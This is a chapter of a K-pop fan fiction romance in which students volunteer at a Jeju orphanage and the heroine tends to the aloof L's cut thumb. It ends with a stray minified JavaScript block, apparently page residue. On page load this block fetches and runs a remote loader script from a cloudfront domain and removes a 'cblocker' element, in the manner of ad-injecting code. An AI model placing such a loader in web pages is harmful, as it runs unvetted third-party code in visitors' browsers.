Chapter 11

The Presidential Son

 

Your POV

 

After dropping our bags at the hotel we arrived at this farm just at the south of Jeju. There was a red brick building, which was the orphanage. I felt someone poke my side as I walked.

“Take care.” Kai whispered and walked on.

“Haerin, I heard about what happened between Sekyung~”

“Not you too~”

Hyorin grinned.

“I know, you and Kai…wouldn’t get along well.”

Oh, if only you knew, Hyo.

I felt this really cold presence beside us, of course, Myungsoo.

“Room assignments as well as the children’s list of materials.” He said as he gave me a piece of paper.

“I’m doing this alone?” I asked.

“You want to?” He asked with a straight face.

 

Narrator’s POV

 

Haerin didn’t reply but she just walked forwards with Hyorin gaping at her.

“Ya, aren’t you afraid? He’s L!”

“So? I think he’s just lazy.”

“He’s a gangster!”

“No one really knows, Hyo.” She shrugged.

“You don’t care, do you?” Hyorin asked.

“Sort of, I mean it’s just a semester together.”

 

They entered the hall and they were introduced to the kids.

“By the end of the semester we’ll be conducting a concert for the fund raising and while planning on that we will be working with the kids as a part of our reach out in the curriculum.”

Haerin nodded and began writing away. Then she felt someone push her. She almost lost her balance, but someone pulled her back.

“Seriously, Sekyung.” Woohyun muttered. Sekyung glared at Haerin.

“Kai is mine, so back off b.tch.” She hissed.

“He’s not yours, Sekyung.” Haerin hissed back. It surprised Woohyun….and L who was standing behind his hyung.

“Are you fighting back now, Miss Park?” Sekyung smirked.

“She’s right, you don’t own me.” Kai crossed his arms.

“We broke up because you are whiny and…artificial. In other words….trash~”

“Kim Jongin.” Haerin slipped. Now, the whole crowd stopped what they were doing and looked at them.

Sekyung’s eyes started to moisten and she left with her posse behind her.

“I…..” Haerin stuttered.

“Glad to know you like my real name, but I prefer Kai, Haerin-SSI.” Kai smirked and walked away.

 

Your POV

 

AHH! Why do I have to call him his real name? People will become more suspicious of me now~

“Ya, start moving now.” Myungsoo nudged my shoulder.

 

 

The two of us ended up outside helping the other students fixing the chairs and tables for the lunch with the kids.

I heard Myungsoo curse under his breath. I saw his thumb bleeding.

“Ya, what happened?” I asked. He pulled his hand away.

“That needs to be cleaned up, Myungsoo.”

“I’m L.”

“Myungsoo sounds more normal.” I replied as I got my handkerchief and gave it to him.

“Place it there.” I said. He got the cloth from me and placed it on his thumb.

“You need to get that washed, you don’t know if some of the wood from the chair~”

“It’s fine.”

“I don’t want to have a sick and useless partner so, let’s go and get that cleaned up.”

 

Narrator’s POV

They got the first aid kit from the professor. Haerin took out some disinfectant and began patting it on his thumb. L shifted on his seat uncomfortably. He winced as she began placing some sort of liquid on his thumb.

“Do you want a Hello Kitty band aid?” She asked. Myungsoo gave her a look. She chuckled and placed it on his thumb.

“Ya!”

“You didn’t say anything, I’ll take it as a yes.” She patted his hand and placed the kit on the table. Myungsoo shook his head and laughed lightly.

“Do you even know who I am?” He asked.

“Kim Myungsoo, school’s thorn, gangster, delinquent…..bad record.” She said.

“You’re not…scared of me?” He asked.

“No, you’re just human, come on, you don’t think that highly of yourself right?”

“I mean you did hear about what people say about me.”

“Yes, you happen to be rude to girls and and you sleep all the time, I don’t know if that’s part of being gangster.”

 

Sungyeol saw the two talking. He was puzzled, because Myungsoo was talking and occasionally smiling out in the open. Choding was that happy that he wanted to jump around the place.

He always knew that Park Haerin was different. He just proved it today, she made L talk!

 

++++++++++++++++++++++++++++++++++++


if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};